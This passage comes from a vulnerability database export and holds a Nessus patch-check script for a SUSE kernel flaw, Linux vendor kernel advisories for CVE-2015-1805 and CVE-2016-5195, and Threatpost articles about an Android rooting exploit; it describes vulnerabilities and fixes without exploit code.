script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/27\");\n\n script_cve_id(\"CVE-2018-9568\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:4196-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.61-52_141 fixes one issue.\n\nThe following security issue was fixed :\n\nCVE-2018-9568: Prevent possible memory corruption due to type\nconfusion in sk_clone_lock. This could lead to local privilege\nescalation (bsc#1118319).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1118320\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-9568/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20184196-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7a7068fc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2018-2993=1 SUSE-SLE-SERVER-12-2018-2994=1\nSUSE-SLE-SERVER-12-2018-3000=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_136-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_136-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_141-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_141-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_146-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_146-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_136-default-7-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_136-xen-7-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_141-default-6-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_141-xen-6-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_146-default-4-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_146-xen-4-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:47:11", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1805"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's implementation of vectored pipe read\nand write functionality did not take into account the I/O vectors that were\nalready processed when retrying after a failed atomic access operation,\npotentially resulting in memory corruption due to an I/O vector array\noverrun. A local, unprivileged user could use this flaw to crash the system\nor, potentially, escalate their privileges on the system. (CVE-2015-1805,\nImportant)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update also fixes the following bugs:\n\n* The backlog data could previously not be consumed when the\naudit_log_start() function was running even if audit_log_start() called the\nwait_for_auditd() function to consume it. As only auditd could consume the\nbacklog data, audit_log_start() terminated unexpectedly. Consequently, the\nsystem became unresponsive until the backlog timeout was up. With this\nupdate, audit_log_start() no longer terminates and the system shuts down\nand reboots gracefully in a timely manner. (BZ#1140489)\n\n* Direct I/O writes extending a parallel file could previously race to\nupdate the size of the file. If the writes executed in the out-of-order\nmanner, the file size could move backwards and push a previously completed\nwrite beyond EOF, causing it to be lost. With this update, file size\nupdates are always executed in appropriate order, thus fixing this bug.\n(BZ#1218497)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n", "modified": "2015-07-07T22:13:10", "published": "2015-07-07T04:00:00", "id": "RHSA-2015:1211", "href": "https://access.redhat.com/errata/RHSA-2015:1211", "type": "redhat", "title": "(RHSA-2015:1211) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:26", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1805"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's implementation of vectored pipe read\nand write functionality did not take into account the I/O vectors that were\nalready processed when retrying after a failed atomic access operation,\npotentially resulting in memory corruption due to an I/O vector array\noverrun. A local, unprivileged user could use this flaw to crash the system\nor, potentially, escalate their privileges on the system. (CVE-2015-1805,\nImportant)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update also fixes the following bug:\n\n* Previously, the signal delivery paths did not clear the TS_USEDFPU flag,\nwhich could cause problems in the switch_to() function and lead to\nfloating-point unit (FPU) corruption. With this update, TS_USEDFPU is\ncleared as expected, and FPU is no longer under threat of corruption.\n(BZ#1214237)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n", "modified": "2017-09-08T12:16:24", "published": "2015-06-25T04:00:00", "id": "RHSA-2015:1190", "href": "https://access.redhat.com/errata/RHSA-2015:1190", "type": "redhat", "title": "(RHSA-2015:1190) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:33", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1805"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's implementation of vectored pipe read\nand write functionality did not take into account the I/O vectors that were\nalready processed when retrying after a failed atomic access operation,\npotentially resulting in memory corruption due to an I/O vector array\noverrun. A local, unprivileged user could use this flaw to crash the system\nor, potentially, escalate their privileges on the system. (CVE-2015-1805,\nImportant)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update also fixes the following bug:\n\n* Previously, the signal delivery paths did not clear the TS_USEDFPU flag,\nwhich could confuse the switch_to() function and lead to floating-point\nunit (FPU) corruption. With this update, TS_USEDFPU is cleared as expected,\nand FPU is no longer under threat of corruption. (BZ#1214239)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n", "modified": "2017-09-08T12:07:15", "published": "2015-06-16T04:00:00", "id": "RHSA-2015:1120", "href": "https://access.redhat.com/errata/RHSA-2015:1120", "type": "redhat", "title": "(RHSA-2015:1120) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:44", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1805"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's implementation of vectored pipe read\nand write functionality did not take into account the I/O vectors that were\nalready processed when retrying after a failed atomic access operation,\npotentially resulting in memory corruption due to an I/O vector array\noverrun. A local, unprivileged user could use this flaw to crash the system\nor, potentially, escalate their privileges on the system. (CVE-2015-1805,\nImportant)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update fixes the following bugs:\n\n* Due to a bug in the lpfc_device_reset_handler() function, a scsi command\ntimeout could lead to a system crash. With this update,\nlpfc_device_reset_handler recovers storage without crashing. (BZ#1070964)\n\n* Due to the code decrementing the reclaim_in_progress counter without\nhaving incremented it first, severe spinlock contention occurred in the\nshrink_zone() function even though the vm.max_reclaims_in_progress feature\nwas set to 1. This update provides a patch fixing the underlying source\ncode, and spinlock contention no longer occurs in this scenario.\n(BZ#1164105)\n\n* A TCP socket using SACK that had a retransmission but recovered from it,\nfailed to reset the retransmission timestamp. As a consequence, on certain\nconnections, if a packet had to be re-transmitted, the retrans_stamp\nvariable was only cleared when the next acked packet was received.\nThis could lead to an early abortion of the TCP connection if this next\npacket also got lost. With this update, the socket clears retrans_stamp\nwhen the recovery is completed, thus fixing the bug. (BZ#1205521)\n\n* Previously, the signal delivery paths did not clear the TS_USEDFPU flag,\nwhich could cause problems in the switch_to() function and lead to\nfloating-point unit (FPU) corruption. With this update, TS_USEDFPU is\ncleared as expected, and FPU is no longer under threat of corruption.\n(BZ#1193505)\n\n* A race condition in the exit_sem() function previously caused the\nsemaphore undo list corruption. As a consequence, a kernel crash could\noccur. The corruption in the semaphore undo list has been fixed, and the\nkernel no longer crashes in this situation. (BZ#1124574)\n\n* Previously, when running the \"virsh blockresize [Device] [Newsize]\"\ncommand to resize the disk, the new size was not reflected in a Red Hat\nEnterprise Linux 5 Virtual Machine (VM). With this update, the new size is\nnow reflected online immediately in a Red Hat Enterprise Linux 5 VM so it\nis no longer necessary to reboot the VM to see the new disk size.\n(BZ#1200855)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n", "modified": "2017-09-08T12:18:39", "published": "2015-06-02T04:00:00", "id": "RHSA-2015:1042", "href": "https://access.redhat.com/errata/RHSA-2015:1042", "type": "redhat", "title": "(RHSA-2015:1042) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.", "modified": "2016-10-27T12:44:17", "published": "2016-10-27T12:41:42", "id": "RHSA-2016:2120", "href": "https://access.redhat.com/errata/RHSA-2016:2120", "type": "redhat", "title": "(RHSA-2016:2120) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:14", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating\nsystem.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem\nhandled the copy-on-write (COW) breakage of private read-only memory mappings.\nAn unprivileged, local user could use this flaw to gain write access to\notherwise read-only memory mappings and thus increase their privileges on the\nsystem. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\n", "modified": "2017-09-08T11:56:15", "published": "2016-10-31T04:00:00", "id": "RHSA-2016:2126", "href": "https://access.redhat.com/errata/RHSA-2016:2126", "type": "redhat", "title": "(RHSA-2016:2126) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:35:52", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1805"], "description": "kernel\n[2.6.18-406]\n- [fs] pipe: fix pipe corruption and iovec overrun on partial copy (Mateusz Guzik) [1203787] {CVE-2015-1805}\n[2.6.18-405]\n- [net] tcp: zero retrans_stamp if all retrans were acked (Marcelo Leitner) [1205521]\n- [net] tcp: fix retrans_stamp advancing in error cases (Marcelo Leitner) [1205521]\n- [net] tcp: Fix inconsistency source (Marcelo Leitner) [1205521]\n- [ipc] sem: fix the potential use-after-free in freeary() (Oleg Nesterov) [1124574]\n- [scsi] lpfc: Fix crash in device reset handler (Rob Evers) [1070964]\n- [mm] fix broken max_reclaims_in_progress memory reclaim throttle (Lachlan McIlroy) [1164105]\n- [x86_64] fpu: save_i387() must clr TS_USEDFPU along with stts() (Oleg Nesterov) [1193505]\n- [block] virtio: Call revalidate_disk() upon online disk resize (Stefan Hajnoczi) [1200855]\n- [block] virtio: fix config handler race (Stefan Hajnoczi) [1200855]\n- [block] virtio: allow re-reading config space at runtime (Stefan Hajnoczi) [1200855]", "edition": 4, "modified": "2015-06-02T00:00:00", "published": "2015-06-02T00:00:00", "id": "ELSA-2015-1042", "href": "http://linux.oracle.com/errata/ELSA-2015-1042.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-30T19:16:47", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1805"], "description": "kernel\n[2.6.18-406.0.0.0.1]\n- [netfront] fix ring buffer index go back led vif stop [orabug 18272251]\n- [net] fix tcp_trim_head() (James Li) [orabug 14512145, 19219078]\n- ocfs2: dlm: fix recovery hung (Junxiao Bi) [orabug 13956772]\n- i386: fix MTRR code (Zhenzhong Duan) [orabug 15862649]\n- [oprofile] x86, mm: Add __get_user_pages_fast() [orabug 14277030]\n- [oprofile] export __get_user_pages_fast() function [orabug 14277030]\n- [oprofile] oprofile, x86: Fix nmi-unsafe callgraph support [orabug 14277030]\n- [oprofile] oprofile: use KM_NMI slot for kmap_atomic [orabug 14277030]\n- [oprofile] oprofile: i386 add get_user_pages_fast support [orabug 14277030]\n- [kernel] Initialize the local uninitialized variable stats. [orabug 14051367]\n- [fs] JBD:make jbd support 512B blocks correctly for ocfs2. [orabug 13477763]\n- [mm] fix hugetlb page leak (Dave McCracken) [orabug 12375075]\n- fix ia64 build error due to add-support-above-32-vcpus.patch(Zhenzhong Duan)\n- [x86] use dynamic vcpu_info remap to support more than 32 vcpus (Zhenzhong Duan)\n- [x86] Fix lvt0 reset when hvm boot up with noapic param\n- [scsi] remove printk's when doing I/O to a dead device (John Sobecki, Chris Mason)\n [orabug 12342275]\n- [char] ipmi: Fix IPMI errors due to timing problems (Joe Jin) [orabug 12561346]\n- [scsi] Fix race when removing SCSI devices (Joe Jin) [orabug 12404566]\n- [net] net: Redo the broken redhat netconsole over bonding (Tina Yang) [orabug 12740042]\n- [fs] nfs: Fix __put_nfs_open_context() NULL pointer panic (Joe Jin) [orabug 12687646]\n- fix filp_close() race (Joe Jin) [orabug 10335998]\n- make xenkbd.abs_pointer=1 by default [orabug 67188919]\n- [xen] check to see if hypervisor supports memory reservation change\n (Chuck Anderson) [orabug 7556514]\n- [net] Enable entropy for bnx2,bnx2x,e1000e,igb,ixgb,ixgbe,ixgbevf (John Sobecki)\n [orabug 10315433]\n- [NET] Add xen pv netconsole support (Tina Yang) [orabug 6993043] [bz 7258]\n- [mm] Patch shrink_zone to yield during severe mempressure events, avoiding\n hangs and evictions (John Sobecki,Chris Mason) [orabug 6086839]\n- [mm] Enhance shrink_zone patch allow full swap utilization, and also be\n NUMA-aware (John Sobecki,Chris Mason,Herbert van den Bergh) [orabug 9245919]\n- fix aacraid not to reset during kexec (Joe Jin) [orabug 8516042]\n- [xen] PVHVM guest with PoD crashes under memory pressure (Chuck Anderson)\n [orabug 9107465]\n- [xen] PV guest with FC HBA hangs during shutdown (Chuck Anderson)\n [orabug 9764220]\n- Support 256GB+ memory for pv guest (Mukesh Rathor) [orabug 9450615]\n- fix overcommit memory to use percpu_counter for (KOSAKI Motohiro,\n Guru Anbalagane) [orabug 6124033]\n- [ipmi] make configurable timeouts for kcs of ipmi [orabug 9752208]\n- [ib] fix memory corruption (Andy Grover) [orabug 9972346]\n- [usb] USB: fix __must_check warnings in drivers/usb/core/ (Junxiao Bi) [orabug 14795203]", "edition": 6, "modified": "2015-06-03T00:00:00", "published": "2015-06-03T00:00:00", "id": "ELSA-2015-1042-1", "href": "http://linux.oracle.com/errata/ELSA-2015-1042-1.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:18", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "kernel-uek\n[4.1.12-61.1.16]\n- mm: remove gup_flags FOLL_WRITE games from __get_user_pages() (Linus Torvalds) [Orabug: 24927306] {CVE-2016-5195}\n[4.1.12-61.1.15]\n- drivers/nvme: provide a module parameter for setting number of I/O queues (Shan Hai) [Orabug: 24914956] \n- blk-mq: improve warning for running a queue on the wrong CPU (Jens Axboe) [Orabug: 24914956] \n- blk-mq: fix freeze queue race (Shan Hai) [Orabug: 24914956]", "edition": 4, "modified": "2016-10-21T00:00:00", "published": "2016-10-21T00:00:00", "id": "ELSA-2016-3632", "href": "http://linux.oracle.com/errata/ELSA-2016-3632.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:26:15", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1805"], "description": "**CentOS Errata and Security Advisory** CESA-2015:1042\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's implementation of vectored pipe read\nand write functionality did not take into account the I/O vectors that were\nalready processed when retrying after a failed atomic access operation,\npotentially resulting in memory corruption due to an I/O vector array\noverrun. A local, unprivileged user could use this flaw to crash the system\nor, potentially, escalate their privileges on the system. (CVE-2015-1805,\nImportant)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update fixes the following bugs:\n\n* Due to a bug in the lpfc_device_reset_handler() function, a scsi command\ntimeout could lead to a system crash. With this update,\nlpfc_device_reset_handler recovers storage without crashing. (BZ#1070964)\n\n* Due to the code decrementing the reclaim_in_progress counter without\nhaving incremented it first, severe spinlock contention occurred in the\nshrink_zone() function even though the vm.max_reclaims_in_progress feature\nwas set to 1. This update provides a patch fixing the underlying source\ncode, and spinlock contention no longer occurs in this scenario.\n(BZ#1164105)\n\n* A TCP socket using SACK that had a retransmission but recovered from it,\nfailed to reset the retransmission timestamp. As a consequence, on certain\nconnections, if a packet had to be re-transmitted, the retrans_stamp\nvariable was only cleared when the next acked packet was received.\nThis could lead to an early abortion of the TCP connection if this next\npacket also got lost. With this update, the socket clears retrans_stamp\nwhen the recovery is completed, thus fixing the bug. (BZ#1205521)\n\n* Previously, the signal delivery paths did not clear the TS_USEDFPU flag,\nwhich could cause problems in the switch_to() function and lead to\nfloating-point unit (FPU) corruption. With this update, TS_USEDFPU is\ncleared as expected, and FPU is no longer under threat of corruption.\n(BZ#1193505)\n\n* A race condition in the exit_sem() function previously caused the\nsemaphore undo list corruption. As a consequence, a kernel crash could\noccur. The corruption in the semaphore undo list has been fixed, and the\nkernel no longer crashes in this situation. (BZ#1124574)\n\n* Previously, when running the \"virsh blockresize [Device] [Newsize]\"\ncommand to resize the disk, the new size was not reflected in a Red Hat\nEnterprise Linux 5 Virtual Machine (VM). With this update, the new size is\nnow reflected online immediately in a Red Hat Enterprise Linux 5 VM so it\nis no longer necessary to reboot the VM to see the new disk size.\n(BZ#1200855)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-June/033194.html\n\n**Affected packages:**\nkernel\nkernel-PAE\nkernel-PAE-devel\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-xen\nkernel-xen-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-1042.html", "edition": 3, "modified": "2015-06-03T01:55:17", "published": "2015-06-03T01:55:17", "href": "http://lists.centos.org/pipermail/centos-announce/2015-June/033194.html", "id": "CESA-2015:1042", "title": "kernel security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:27:18", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "**CentOS Errata and Security Advisory** CESA-2016:2098\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-October/034171.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-tools\nkernel-tools-libs\nkernel-tools-libs-devel\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-2098.html", "edition": 3, "modified": "2016-10-25T11:17:10", "published": "2016-10-25T11:17:10", "href": "http://lists.centos.org/pipermail/centos-announce/2016-October/034171.html", "id": "CESA-2016:2098", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:55:36", "bulletinFamily": "info", "cvelist": ["CVE-2015-1805"], "description": "A rooting application has been found in the wild targeting Nexus mobile devices using a local privilege escalation vulnerability patched two years ago in the Linux kernel that remains unpatched in Android.\n\nResearchers at Zimperium, the same company that discovered last summer\u2019s Stagefright flaws affecting Android, privately disclosed to Google last Tuesday they found an application that had been used to root a Nexus 5 device. This news came a little less than a month after researchers at CORE Team reported to Google that [CVE-2015-1805](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1805>), which was addressed in the Linux kernel in 2014, also affected Android devices.\n\nThe discovery of the rooting application\u2014Google said the exploit was not malicious\u2014prompted Google to push out emergency patches to its partners last Wednesday, and updates for Nexus devices. Partner patches are subject to carriers and handset manufacturers pushing the fixes to customer devices.\n\nGoogle said in an [advisory](<https://source.android.com/security/advisory/2016-03-18.html>) published last Friday that all Android devices on kernel versions 3.4, 3.10 and 3.14, including all Nexus devices are vulnerable. Android devices using Linux kernel version 3.18 or higher are not vulnerable.\n\n\u201cThis issue is rated as a critical severity issue due to the possibility of a local privilege escalation and arbitrary code execution leading to local permanent device compromise,\u201d Google said.\n\nRooting applications are particularly dangerous, not only because they are spread usually via Trojanized applications, but because they give their respective payloads system-level persistence.\n\nZimperium founder and CTO Zuk Avraham called the vulnerability being exploited by this particular rooting app \u201cquite generic,\u201d and said that it could be chained with other exploits to gain deeper penetration onto a device.\n\n\u201cIt allows for consistent elevation of privilege, so anyone with malicious intentions with code execution already on a device and wants higher code execution, could use it to get access to the microphone or camera, or read email, anything like that,\u201d Avraham said. \u201cBut you do need an initial code execution vulnerability or a presence on the device like an app for example. Then you can use this exploit, which is quite generic, and gain kernel privileges on the device.\u201d\n\nAvraham said this flaw was able to generate a payload on a device with a March 1, 2016 patch level, the most up to date patch level. He said the rooting app was spreading on an outside Android market away from Google\u2019s Google Play marketplace.\n\nGoogle said Google Play already blocks rooting applications by default, and that this particular rooting application if downloaded and manually installed from outside Google Play will also be blocked by Google\u2019s Verify Apps tool. Verify Apps, the former Bouncer, scans apps in Google Play for harmful behaviors and warns users not to install them if they\u2019re deemed dangerous.\n\n\u201cVerify Apps has been updated to block the installation of applications that we have learned are attempting to exploit this vulnerability both within and outside of Google Play,\u201d Google said in its advisory.\n\nSince rooting applications are banned from Google Play, an attacker would have to somehow convince a victim to manually install the app.\n\nGoogle said users can check the patch levels of their phone to determine whether they are vulnerable to these attacks; devices with a security patch level of March 18, 2016 or April 2, 2016 are not vulnerable, Google said.\n\nThis news comes days after the disclosure of new [exploits targeting vulnerabilities in libstagefright](<https://threatpost.com/stagefright-variant-metaphor-puts-millions-of-samsung-lg-and-htc-phones-at-risk/116870/>) called Metaphor, which uses malicious video files in two stages, to exploit Nexus 5, LG G3, HTC One and Samsung Galaxy S5 handsets. The first video checks for the presence of the particular Stagefright flaw, and the second exploits the bug if it\u2019s present on the device. The attack gives attackers remote control over the Android device.\n", "modified": "2016-03-24T19:16:41", "published": "2016-03-23T07:00:46", "id": "THREATPOST:AF1B767CD9BF9276A4427C90B4CEAA8D", "href": "https://threatpost.com/nexus-android-devices-vulnerable-to-rooting-application-permanent-compromise/116942/", "type": "threatpost", "title": "Android Rooting Application Emergency Patch", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:33", "bulletinFamily": "info", "cvelist": ["CVE-2015-1805"], "description": "Google has patched a vulnerability being [exploited in the wild](<https://threatpost.com/nexus-android-devices-vulnerable-to-rooting-application-permanent-compromise/116942/>) to root Nexus 5 Android devices.\n\nThe public exploit\u2014a [rooting application](<https://source.android.com/security/advisory/2016-03-18.html>)\u2014was privately disclosed to Google on March 15 by Zimperium researchers, and a less than a month after CORE Team researchers reported that [CVE-2015-1805](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1805>), which was patched in 2014 in the Linux kernel, also affects Android devices.\n\nThe patch is part of today\u2019s monthly Android patch release. The [Android Nexus Security Bulletin](<https://source.android.com/security/bulletin/index.html>) patches 15 vulnerabilities rated critical by Google in eight Android components, including Mediaserver and libstagefright.\n\nThe elevation of privilege bug exploited by the rooting application is the lone kernel-level flaw patched this month and it affects Nexus versions 4.4.4, 5.0.2, 5.1.1, 6.0 and 6.0.1. Google warned last month that exploits could lead to permanent device compromise.\n\nRooting applications are particularly dangerous because they give their respective payloads system-level persistence. Zimperium founder and CTO Zuk Avraham told Threatpost the vulnerability could be chained with other exploits to gain deeper penetration onto a device.\n\n\u201cIt allows for consistent elevation of privilege, so anyone with malicious intentions with code execution already on a device and 